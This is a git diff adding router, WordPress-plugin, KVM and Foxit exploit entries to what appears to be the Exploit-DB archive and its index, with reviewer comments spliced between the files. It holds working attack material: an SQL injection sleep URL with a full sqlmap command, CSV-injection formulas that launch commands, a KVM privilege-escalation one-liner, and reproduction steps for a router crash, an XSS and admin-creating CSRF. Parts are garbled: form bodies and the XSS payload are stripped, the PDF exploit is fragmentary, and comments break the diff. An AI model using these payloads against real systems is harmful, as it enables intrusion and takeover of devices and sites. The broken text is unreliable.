diff --git a/exploits/hardware/dos/44934.txt b/exploits/hardware/dos/44934.txt
new file mode 100644
index 000000000..180810aa9
--- /dev/null
+++ b/exploits/hardware/dos/44934.txt
@@ -0,0 +1,20 @@
+# Exploit Title: DIGISOL DG-BR4000NG - Buffer Overflow (PoC)
+# Date 2018-06-24
+# Vendor Homepage† http://www.digisol.com
+# Hardware Link httpswww.amazon.inDigisol-DG-BR4000NG-Wireless-Broadband-802-11ndpB00A19EHYK
+# Version: DIGISOL DG-BR4000NG Wireless Router
+# Category Hardware
+# Exploit Author Adipta Basu
+# Tested on Mac OS High Sierra
+# CVE CVE-2018-12706
+
+# Reproduction Steps
+
+- Goto your Wifi Router Gateway [i.e http192.168.2.1]
+- Go to -- General Setup -- Wireless -- Basic Settings
+- Open BurpSuite
+- Reload the Page
+- Burp will capture the intercepts.
+- Add a string of 500 ì0îs after the Authorization Basic string
+- The router will restart.
+- Refresh the page, and the whole web interface will be faulty.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44933.txt b/exploits/hardware/webapps/44933.txt
new file mode 100644
index 000000000..ca16b5bc0
--- /dev/null
+++ b/exploits/hardware/webapps/44933.txt
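Review bot: Several header fields in 44934.txt have lost their `:` separator (`# Date 2018-06-24`, `# CVE CVE-2018-12706`), and the hardware link and gateway URL have lost `://` and `/`, which looks like an encoding problem in the submitted text; the sibling entry 44935.txt in this commit carries the same fields intact. Anything that reads the header to pick up the CVE or date will miss this entry, so the lines should read `# Date: 2018-06-24` and `# CVE: CVE-2018-12706`, with the links restored from 44935.txt. The `# Version:` line names the product rather than a firmware build, so a defender cannot tell which firmware is affected; the tested firmware version should be added if the author has it.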
@@ -0,0 +1,40 @@ +# Exploit Title:​​ Intex Router N-150 - Cross-Site Request Forgery (Add Admin) +# Date: 2018-06-23 +# Exploit Author: Navina Asrani +# Version: N-150 +# CVE : N/A +# Category: Router Firmware + +# 1. Description +# The firmware allows malicious request to be executed without verifying +# source of request. This leads to arbitrary execution with malicious request +# which will lead to the creation of a privileged user.. + +# 2. Proof of Concept +# Visit the application +# Go to any router setting modification page and change the values, +# create a request and observe the lack of CSRF tokens. +# Craft an html page with all the details for the built-in admin +# user creation and host it on a server +# Upon the link being clicked by a logged in admin user, +# immediately, the action will get executed +# Exploitation Technique: A attacker can create a rogue admin user to gain +# access to the application. + +# Exploit code: + + + +
+ + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44935.txt b/exploits/hardware/webapps/44935.txt new file mode 100644 index 000000000..e5de7efb8 --- /dev/null +++ b/exploits/hardware/webapps/44935.txt @@ -0,0 +1,20 @@ +# Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting +# Date: 2018-06-24 +# Vendor Homepage:  http://www.digisol.com +# Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK +# Category: Hardware +# Exploit Author: Adipta Basu +# Contact : https://www.facebook.com/AdiptaBasu +# Web: https://hackings8n.blogspot.com +# Tested on: Mac OS High Sierra +# CVE: CVE-2018-12705 +  +# Reproduction Steps: +  +- Goto your Wifi Router Gateway [i.e: http://192.168.2.1] +- Go to --> "General Setup" --> "Wireless" --> "Basic Settings" +- Open BurpSuite +- Change the SSID to "Testing" and hit "Apply" +- Burp will capture the intercepts. +- Now change the SSID to +- Refresh the page, and you will get the "ADIPTA" pop-up \ No newline at end of file diff --git a/exploits/hardware/webapps/44936.txt b/exploits/hardware/webapps/44936.txt new file mode 100644 index 000000000..b92ebe7ee --- /dev/null +++ b/exploits/hardware/webapps/44936.txt 
@@ -0,0 +1,54 @@ +# Exploit title: Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser) +# Date: 2018-05-21 +# Author: LiquidWorm +# Vendor: Ecessa Corporation +# Product web page: https://www.ecessa.com +# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24 + +# Summary: Ecessa's WANworX SD-WAN solutions increase network performance and +# reliability by leveraging any connection. That can be premium priced MPLS, +# lower cost broadband, or cellular 4G or LTE. Many of today’s WAN deployments +# are based on older technology that was acceptable when businesses did not run +# at breakneck speed or when operations didn’t grind to a halt when connectivity +# was disrupted. In today’s cloud-based applications, datacenters and distributed +# networks, where so much is virtualized and delivered as–a-service, limited +# bandwidth and network outages don’t just slow productivity, they stop it. + +# Desc: The application interface allows users to perform certain actions via +# HTTP requests without performing any validity checks to verify the requests. +# This can be exploited to perform certain actions with administrative privileges +# if a logged-in user visits a malicious web site. + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44937.txt b/exploits/hardware/webapps/44937.txt new file mode 100644 index 000000000..eedfcb04d --- /dev/null +++ b/exploits/hardware/webapps/44937.txt @@ -0,0 +1,28 @@ +# Exploit Title: AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password) +# Date: 2018-06-23 +# Exploit Author: Wadeek +# Vendor Homepage: https://www.asus.com/ +# Firmware Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC750GF/FW_RT_AC750GF_30043806038.zip +# Firmware Version: 3.0.0.4.380.6038 +# Tested on: ASUS RT-AC750GF with default firmware version 3.0.0.4.380.6038 + +# (Cross Site Scripting -> URL Redirecting -> Cross-Site Request Forgery {Cookie: asus_token} +# -> Change the router login password and enable SSH daemon) + + + +
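Review bot: The title of 44936.txt says `< 10.7.4` while its `# Affected version:` line lists 10.7.4 among the affected builds (and lists it twice), so the entry contradicts itself on whether 10.7.4 is vulnerable. The same duplicated list appears in 44938.txt, where the file title says `10.7.4` but its row in files_exploits.csv says `< 10.7.4`. One form should be used consistently across title, body and index, and the duplicate `10.7.4` dropped. Neither write-up names a fixed release or a mitigation, so a line stating the patched version, or that none was available at publication, would help anyone triaging these devices.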

Proof Of Concept

+ +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44938.txt b/exploits/hardware/webapps/44938.txt new file mode 100644 index 000000000..496347c71 --- /dev/null +++ b/exploits/hardware/webapps/44938.txt @@ -0,0 +1,48 @@ +# Exploit Title: Ecessa ShieldLink SL175EHQ 10.7.4 - Cross-Site Request Forgery (Add Superuser) +# Date: 2018-05-21 +# Vendor: Ecessa Corporation +# Product web page: https://www.ecessa.com +# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24 + +# Summary: Ecessa's ShieldLink 60, 175, 600,1200 & 4000 are advanced, yet highly +# affordable secure WAN Optimization Controllers that incorporate all of the ISP/WAN +# link. + +# Desc: The application interface allows users to perform certain actions via +# HTTP requests without performing any validity checks to verify the requests. +# This can be exploited to perform certain actions with administrative privileges +# if a logged-in user visits a malicious web site. + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44939.txt b/exploits/hardware/webapps/44939.txt new file mode 100644 index 000000000..da6f30197 --- /dev/null +++ b/exploits/hardware/webapps/44939.txt @@ -0,0 +1,17 @@ +# Exploit Title:​​ Intex Router N-150 - Arbitrary File Upload +# Date: 2018-06-23 +# Exploit Author: Samrat Das +# Version: N-150 +# CVE : N/A +# Category: Router Firmware + +# 1. Description +# The firmware allows malicious files to be uploaded without any checking of +# extensions and allows filed to be uploaded. + +# 2. Proof of Concept + +- Visit the application +- Go to the advanced settings post login +- Under backup- restore page upload any random file extension and hit go. +- Upon the file being upload, the firmware will get rebooted accepting the arbitrary file. \ No newline at end of file diff --git a/exploits/linux/dos/44944.txt b/exploits/linux/dos/44944.txt new file mode 100644 index 000000000..48ae5177f --- /dev/null +++ b/exploits/linux/dos/44944.txt 
@@ -0,0 +1,24 @@
+When KVM (on Intel) virtualizes another hypervisor as L1 VM it does not verify that VMX instructions from the L1 VM (which trigger a VM exit and are emulated by L0 KVM) are coming from ring 0.
+
+For code running on bare metal or VMX root mode this is enforced by hardware. However, for code running in L1, the instruction always triggers a VM exit even when executed with cpl 3. This behavior is documented by Intel (example is for the VMPTRST instruction):
+
+(Intel Manual 30-18 Vol. 3C)
+IF (register operand) or (not in VMX operation) or (CR0.PE = 0) or (RFLAGS.VM = 1) or (IA32_EFER.LMA = 1 and CS.L = 0)
+ THEN #UD;
+ELSIF in VMX non-root operation
+ THEN VMexit;
+ELSIF CPL > 0
+ THEN #GP(0);
+ELSE
+ 64-bit in-memory destination operand ← current-VMCS pointer;
+
+This means that a normal user space program running in the L1 VM can trigger KVMs VMX emulation which gives a large number of privilege escalation vectors (fake VMCS or vmptrld / vmptrst to a kernel address are the first that come to mind). As VMX emulation code checks for the guests CR4.VMXE value this only works if a L2 guest is running.
+
+A somewhat realistic exploit scenario would involve someone breaking out of a L2 guest (for example by exploiting a bug in the L1 qemu process) and then using this bug for privilege escalation on the L1 system.
+
+Simple POC (tested on L0 and L1 running Ubuntu 18.04 4.15.0-22-generic).
+This requires that a L2 guest exists:
+
+echo 'main(){asm volatile ("vmptrst 0xffffffffc0031337");}'| gcc -xc - ; ./a.out
+
+[ 2537.280319] BUG: unable to handle kernel paging request at ffffffffc0031337
\ No newline at end of file
diff --git a/exploits/linux/webapps/44932.txt b/exploits/linux/webapps/44932.txt
new file mode 100644
index 000000000..7ebba0143
--- /dev/null
+++ b/exploits/linux/webapps/44932.txt
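Review bot: 44944.txt carries no CVE identifier, fixed kernel version or upstream commit, so a reader cannot tell from this entry whether a given host is patched; a short header such as `# CVE: <CVE id>` and `# Fixed in: <kernel version / commit>` would make it usable for triage. The file sits under `linux/dos` and is typed `dos` in files_exploits.csv although the text describes privilege escalation from L1 user space; only the crash PoC matches the `dos` label, and the description should say so. Because the issue is reached through KVM's nested VMX emulation, a line noting that hosts which do not need nested virtualization can leave the kvm_intel `nested` parameter off would give defenders an interim mitigation.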
@@ -0,0 +1,49 @@ +# Exploit Title: Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser) +# Author: LiquidWorm +# Date: 2018-05-21 +# Vendor: Ecessa Corporation +# Product web page: https://www.ecessa.com +# Affected version: 10.7.4, 10.6.9, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24 +# Tested on: lighttpd/1.4.35 + +# Summary: Internet Failover and Load Balancing for Small Businesses, Stores +# and Branch Offices. + +# Desc: The application interface allows users to perform certain actions via +# HTTP requests without performing any validity checks to verify the requests. +# This can be exploited to perform certain actions with administrative privileges +# if a logged-in user visits a malicious web site. + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/44931.txt b/exploits/php/webapps/44931.txt new file mode 100644 index 000000000..8b8883a76 --- /dev/null +++ b/exploits/php/webapps/44931.txt @@ -0,0 +1,27 @@ +# Exploit Title: Wordpress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection +# Google Dork: N/A +# Date: 2018-06-24 +# Exploit Author: Bhushan B. Patil +# Software Link: https://wordpress.org/plugins/woo-order-export-lite/ +# Affected Version: 1.5.4 and before +# Category: Plugins and Extensions +# Tested on: WiN7_x64 +# CVE: CVE-2018-11525 + +# 1. Application Description: +# The plugin helps you to easily export WooCommerce order data. Export any custom field assigned +# to orders/products/coupons is easy and you can select from various formats to export the data +# in such as CSV, XLS, XML and JSON. + +# 2. Technical Description: +# Advanced Order Export For WooCommerce plugin version 1.5.4 and before are affected by the vulnerability +# Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of +# form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, +# the command is executed. + +# 3. Proof Of Concept: + +Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit. + +# When high privileged user logs into the application to export form data in CSV and opens the file. +# Formula gets executed and calculator will get popped in his machine. \ No newline at end of file diff --git a/exploits/php/webapps/44940.txt b/exploits/php/webapps/44940.txt new file mode 100644 index 000000000..efd9ad9c5 --- /dev/null +++ b/exploits/php/webapps/44940.txt 
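Review bot: The title of 44931.txt says `< 1.5.4` but the `# Affected Version:` line says `1.5.4 and before`, so the entry disagrees with itself on whether 1.5.4 is vulnerable; 44940.txt has the same mismatch (`< 2.0.4` against `2.0.4 and before`). The technical description calls the issue "Remote Command Execution", which overstates it: the formula runs only when a privileged user opens the exported CSV in a spreadsheet application and lets it evaluate the cell. Neither file gives a remediation; one sentence would do, for example `# Fix: the exporter should neutralise cell values beginning with =, +, - or @ before writing them to CSV`, together with the patched plugin version if known.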
@@ -0,0 +1,22 @@
+# Exploit Title: Wordpress Plugin Comments Import & Export < 2.0.4 - CSV Injection
+# Google Dork: N/A
+# Date: 2018-06-24
+# Exploit Author: Bhushan B. Patil
+# Software Link: https://wordpress.org/plugins/comments-import-export-woocommerce/
+# Affected Version: 2.0.4 and before
+# Category: Plugins and Extensions
+# Tested on: WiN7_x64
+# CVE: CVE-2018-11526
+
+# 1. Application Description:
+# Comments Import Export Plugin helps you to easily export and import Article and Product Comments in your store.
+
+# 2. Technical Description:
+# WordPress Comments Import & Export plugin version 2.0.4 and before are affected by the vulnerability Remote Command Execution
+# using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with
+# higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
+
+# 3. Proof Of Concept:
+Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
+When high privileged user logs into the application to export form data in CSV and opens the file.
+Formula gets executed and calculator will get popped in his machine.
\ No newline at end of file
diff --git a/exploits/php/webapps/44943.txt b/exploits/php/webapps/44943.txt
new file mode 100644
index 000000000..8eb6a0969
--- /dev/null
+++ b/exploits/php/webapps/44943.txt
@@ -0,0 +1,41 @@
+# Exploit Title: WordPress Plugin iThemes Security(better-wp-security) <= 7.0.2 - Authenticated SQL Injection
+# Date: 2018-06-25
+# Exploit Author: Çlirim Emini
+
+# Website: https://www.sentry.co.com/
+# Vendor Homepage: https://ithemes.com/
+# Software Link: https://wordpress.org/plugins/better-wp-security/
+# Version/s: 7.0.2 and below
+# Patched Version: 7.0.3
+# CVE : 2018-12636
+# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099
+
+Plugin description:
+
+iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress.
+
+Description:
+
+WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php.
+
+Technical details:
+
+Parameter orderby is vulnerable because backend variable $sort_by_column
+is not escaped.
+
+File: better-wp-security/core/admin-pages/logs-list-table.php
+Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) {
+Line 272: $ sort_by_column = $_GET[' orderby '];
+
+File: better-wp-security/core/lib/log-util.php
+Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column ));
+
+Proof of Concept (PoC):
+
+The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:
+
+http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0
+
+Using SQLMAP:
+
+sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3
\ No newline at end of file
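Review bot: The "Technical details" paragraph in 44943.txt blames the bug on `$sort_by_column` being "not escaped", but escaping is not a sound remedy for a value that lands in an `ORDER BY` clause as an identifier. The write-up should say that the safe pattern is to map `orderby` onto a fixed list of known column names and `order` onto `ASC`/`DESC`, and that 7.0.3 is the release to upgrade to. The CVE line reads `# CVE : 2018-12636` without the `CVE-` prefix used by the other entries in this commit, so a search for the full identifier will not find it; it should read `# CVE : CVE-2018-12636`. The quoted source lines contain stray spaces (`$_GET[' orderby ']`, `$ sort_by_column`) that are presumably paste artifacts and should be checked against the plugin source.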
diff --git a/exploits/windows/remote/44941.txt b/exploits/windows/remote/44941.txt new file mode 100644 index 000000000..3f265ee52 --- /dev/null +++ b/exploits/windows/remote/44941.txt @@ -0,0 +1,211 @@ +%PDF +1 0 obj +<> +2 0 obj +<> trailer <> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 900504871..ad814c3d0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5987,6 +5987,7 @@ id,file,description,date,author,type,platform,port 44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows, 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple, 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux, +44944,exploits/linux/dos/44944.txt,"KVM (Nested Virtualization) - L1 Guest Privilege Escalation",2018-06-25,"Google Security Research",dos,linux, 44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php, 44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos, 44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple, 
@@ -6005,6 +6006,7 @@ id,file,description,date,author,type,platform,port
 44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
 44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux,
 44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80
+44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16583,6 +16585,7 @@ id,file,description,date,author,type,platform,port
 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux,
 44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22
+44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39540,6 +39543,7 @@ id,file,description,date,author,type,platform,port
 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
+44943,exploits/php/webapps/44943.txt,"WordPress Plugin iThemes Security < 7.0.3 - SQL Injection",2018-06-25,"Çlirim Emini",webapps,php,80
 44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php,
 44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
 44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
@@ -39579,6 +39583,15 @@ id,file,description,date,author,type,platform,port 44918,exploits/php/webapps/44918.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)",2018-06-21,bay0net,webapps,php,80 44919,exploits/php/webapps/44919.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)",2018-06-21,bay0net,webapps,php,80 44922,exploits/php/webapps/44922.txt,"GreenCMS 2.3.0603 - Information Disclosure",2018-06-22,vr_system,webapps,php, -44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion",2018-06-21,ChaMd5,webapps,php, +44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)",2018-06-21,ChaMd5,webapps,php,80 44926,exploits/php/webapps/44926.txt,"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)",2018-06-22,"Berk Dusunur",webapps,php,80 -44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - Local File Inclusion",2018-06-22,VulnSpy,webapps,php,80 +44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)",2018-06-22,VulnSpy,webapps,php,80 +44931,exploits/php/webapps/44931.txt,"WordPress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection",2018-06-25,"Bhushan B. 
Patil",webapps,php,80 +44932,exploits/linux/webapps/44932.txt,"Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,linux,443 +44933,exploits/hardware/webapps/44933.txt,"Intex Router N-150 - Cross-Site Request Forgery (Add Admin)",2018-06-25,"Samrat Das",webapps,hardware,80 +44935,exploits/hardware/webapps/44935.txt,"DIGISOL DG-BR4000NG - Cross-Site Scripting",2018-06-25,"Adipta Basu",webapps,hardware,80 +44936,exploits/hardware/webapps/44936.txt,"Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,hardware,443 +44937,exploits/hardware/webapps/44937.txt,"AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)",2018-06-25,Wadeek,webapps,hardware,80 +44938,exploits/hardware/webapps/44938.txt,"Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,hardware,443 +44939,exploits/hardware/webapps/44939.txt,"Intex Router N-150 - Arbitrary File Upload",2018-06-25,"Samrat Das",webapps,hardware, +44940,exploits/php/webapps/44940.txt,"WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80
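Review bot: The added row for 44933 credits "Samrat Das", but the header of exploits/hardware/webapps/44933.txt in this same commit reads `# Exploit Author: Navina Asrani`, so either the index or the file is wrong about authorship. Attribution should be confirmed and the two made to agree. The row for 44939 leaves the port column empty while 44933, for the same Intex N-150 web interface, is given port 80; if both are reached through the same admin interface the 44939 row should carry `80` as well. The 44938 row's `< 10.7.4` also differs from that file's own title, which says `10.7.4`.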